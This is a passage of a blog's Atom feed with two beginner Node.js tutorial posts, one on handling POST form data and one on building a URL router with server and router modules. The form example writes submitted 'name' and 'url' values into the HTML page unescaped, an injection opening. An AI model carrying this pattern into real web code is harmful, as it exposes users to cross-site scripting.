class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> querystring = <span class="built_in">require</span>(<span class="string">'querystring'</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">var</span> postHTML = </span><br><span class="line"> <span class="string">'<html><head><meta charset="utf-8"><title>菜鸟教程 Node.js 实例</title></head>'</span> +</span><br><span class="line"> <span class="string">'<body>'</span> +</span><br><span class="line"> <span class="string">'<form method="post">'</span> +</span><br><span class="line"> <span class="string">'网站名: <input name="name"><br>'</span> +</span><br><span class="line"> <span class="string">'网站 URL: <input name="url"><br>'</span> +</span><br><span class="line"> <span class="string">'<input type="submit">'</span> +</span><br><span class="line"> <span class="string">'</form>'</span> +</span><br><span class="line"> <span class="string">'</body></html>'</span>;</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="keyword">var</span> body = <span class="string">""</span>;</span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'data'</span>, <span class="keyword">function</span> (<span class="params">chunk</span>) {</span><br><span class="line"> body += chunk;</span><br><span class="line"> });</span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'end'</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> <span class="comment">// Parse the parameters</span></span><br><span class="line"> body = querystring.<span class="title function_">parse</span>(body);</span><br><span class="line"> <span class="comment">// Set the response headers and encoding</span></span><br><span 
class="line"> res.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">'Content-Type'</span>: <span class="string">'text/html; charset=utf8'</span>});</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(body.<span class="property">name</span> && body.<span class="property">url</span>) { <span class="comment">// Output the submitted data</span></span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站名:"</span> + body.<span class="property">name</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"<br>"</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站 URL:"</span> + body.<span class="property">url</span>);</span><br><span class="line"> } <span class="keyword">else</span> { <span class="comment">// Output the form</span></span><br><span class="line"> res.<span class="title function_">write</span>(postHTML);</span><br><span class="line"> }</span><br><span class="line"> res.<span class="title function_">end</span>();</span><br><span class="line"> });</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>GIF demo of the result:<br><img src="https://img-blog.csdnimg.cn/20200319170115910.gif" alt="在这里插入图片描述"><br>Because of the if statement, if the site name and URL are not both entered, for example only one field is filled in, the page refreshes back to its initial state. I will not include a GIF of that; doing it yourself is the fun part (definitely not because I am lazy)</p><p>This post is based on the <a href="https://www.runoob.com/nodejs/node-js-get-post.html">Node.js 菜鸟教程 (Runoob)</a>; for details see <a href="https://www.runoob.com/nodejs/node-js-get-post.html">菜鸟教程 (Runoob)</a>.</p><hr><p>I will update my earlier posts later</p><hr>]]></content>
<summary type="html"><p>Forms are generally submitted to the server with GET&#x2F;POST requests.</p>
<h2 id="获取GET请求内容"><a href="#获取GET请求内容" class="headerlink" title="获取GET请求内容"></a>Getting the content of a GET request</h2><p>由于G</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>Routing</title>
<link href="http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94%E8%B7%AF%E7%94%B1/"/>
<id>http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94%E8%B7%AF%E7%94%B1/</id>
<published>2020-03-19T10:36:54.000Z</published>
<updated>2022-03-18T06:03:46.017Z</updated>
<content type="html"><![CDATA[<p>We need to give the router the requested URL and any other GET and POST parameters it needs; the router then executes the corresponding code based on this data.</p><p>So we need to inspect the HTTP request and extract the requested URL and the GET/POST parameters from it. For now we treat this as a job of our HTTP server.</p><p>All the data we need is contained in the request object, which is passed as the first argument to the onRequest() callback. To parse this data, however, we need additional Node.js modules, namely the url and querystring modules.</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">                               url.<span class="title function_">parse</span>(string).<span class="property">query</span></span><br><span class="line">                                           |</span><br><span class="line">           url.<span class="title function_">parse</span>(string).<span class="property">pathname</span>      |</span><br><span class="line">                       |                   |</span><br><span class="line">                       |                   |</span><br><span class="line">                     ------ -------------------</span><br><span class="line"><span class="attr">http</span>:<span class="comment">//localhost:8888/start?foo=bar&hello=world</span></span><br><span class="line">                                ---       -----</span><br><span class="line">                                 |          |</span><br><span class="line">                                 |          |</span><br><span class="line">      querystring.<span class="title function_">parse</span>(queryString)[<span class="string">"foo"</span>] |</span><br><span class="line">                                            |</span><br><span class="line">                         querystring.<span class="title function_">parse</span>(queryString)[<span class="string">"hello"</span>]</span><br></pre></td></tr></table></figure><p>The querystring module can also be used to parse the parameters in a POST request body, as shown later.<br>Now let's add some logic to the onRequest() function to find out which URL path the browser requested:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//server.js</span></span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">"http"</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">"url"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">start</span>(<span class="params"></span>) {</span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">onRequest</span>(<span class="params">request, response</span>) {</span><br><span class="line"> <span class="keyword">var</span> pathname = url.<span class="title function_">parse</span>(request.<span class="property">url</span>).<span class="property">pathname</span>;</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Request for "</span> + pathname + <span class="string">" received."</span>);</span><br><span class="line"> response.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">"Content-Type"</span>: <span class="string">"text/plain"</span>});</span><br><span class="line"> response.<span class="title function_">write</span>(<span class="string">"Hello 
World"</span>);</span><br><span class="line"> response.<span class="title function_">end</span>();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> http.<span class="title function_">createServer</span>(onRequest).<span class="title function_">listen</span>(<span class="number">8888</span>);</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Server has started."</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="built_in">exports</span>.<span class="property">start</span> = start;</span><br></pre></td></tr></table></figure><p>The application can now tell requests apart by their URL path. This lets us use the router (not yet finished) to map requests to handlers based on the URL path.<br>In the application we are building, this means that requests for /start and /upload can be handled by different code. We will see later how these pieces fit together.</p><p>Now we can write the router. Create a file named router.js with the following content:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//router.js</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">route</span>(<span class="params">pathname</span>) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"About to route a request for "</span> + pathname);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="built_in">exports</span>.<span class="property">route</span> = route;</span><br></pre></td></tr></table></figure><p>The code above really does nothing yet, but the point for now is how to wire the router and the server together. Hard-coding this dependency into the server is not recommended here; adding the router module loosely through dependency injection is the more widely used approach.<br>First, let's extend the server's start() function so that the route function can be passed in as a parameter. The server.js file looks like this:</p><figure 
class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//server.js</span></span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">"http"</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">"url"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">start</span>(<span class="params">route</span>) {</span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">onRequest</span>(<span class="params">request, response</span>) {</span><br><span class="line"> <span class="keyword">var</span> pathname = url.<span class="title function_">parse</span>(request.<span class="property">url</span>).<span class="property">pathname</span>;</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Request for "</span> + pathname + <span class="string">" received."</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="title 
function_">route</span>(pathname);</span><br><span class="line"> </span><br><span class="line"> response.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">"Content-Type"</span>: <span class="string">"text/plain"</span>});</span><br><span class="line"> response.<span class="title function_">write</span>(<span class="string">"Hello World"</span>);</span><br><span class="line"> response.<span class="title function_">end</span>();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> http.<span class="title function_">createServer</span>(onRequest).<span class="title function_">listen</span>(<span class="number">8888</span>);</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Server has started."</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="built_in">exports</span>.<span class="property">start</span> = start;</span><br></pre></td></tr></table></figure><p>We also extend index.js accordingly, so that the route function can be injected into the server:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// index.js</span></span><br><span class="line"><span class="keyword">var</span> server = <span class="built_in">require</span>(<span class="string">"./server"</span>);</span><br><span class="line"><span class="keyword">var</span> router = <span class="built_in">require</span>(<span class="string">"./router"</span>);</span><br><span class="line"> </span><br><span class="line">server.<span class="title function_">start</span>(router.<span 
class="property">route</span>);</span><br></pre></td></tr></table></figure><ul><li>The function passed in at this point still does nothing.<br>If you start the application now (node index.js; always remember this command) and then request a URL, you will see the application print the corresponding messages. This shows that our HTTP server is already using the router module and passes the requested path to the router:</li></ul><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node index.<span class="property">js</span></span><br><span class="line"><span class="title class_">Server</span> has started.</span><br></pre></td></tr></table></figure><p>Open <a href="http://127.0.0.1:8888/">http://127.0.0.1:8888/</a> in a browser; the output is as follows:<br><img src="https://img-blog.csdnimg.cn/20200319164641372.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="Insert image description here"><br>This blog post is based on the <a href="https://www.runoob.com/nodejs/nodejs-router.html">Runoob Node.js tutorial</a>; for details, see the <a href="https://www.runoob.com/nodejs/nodejs-router.html">Runoob tutorial</a>.</p><hr><p>I will update my earlier blog posts later on.</p><hr>]]></content>
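<summary type="html"><p>We need to give the router the requested URL and any other GET and POST parameters it needs; the router then uses this data to decide which code to execute.</p>
<p>So we need to inspect the HTTP request and extract the requested URL and the GET&#x2F;POST parameters from it. For now, we make this the job of our HTTP server</summary>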
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
</feed>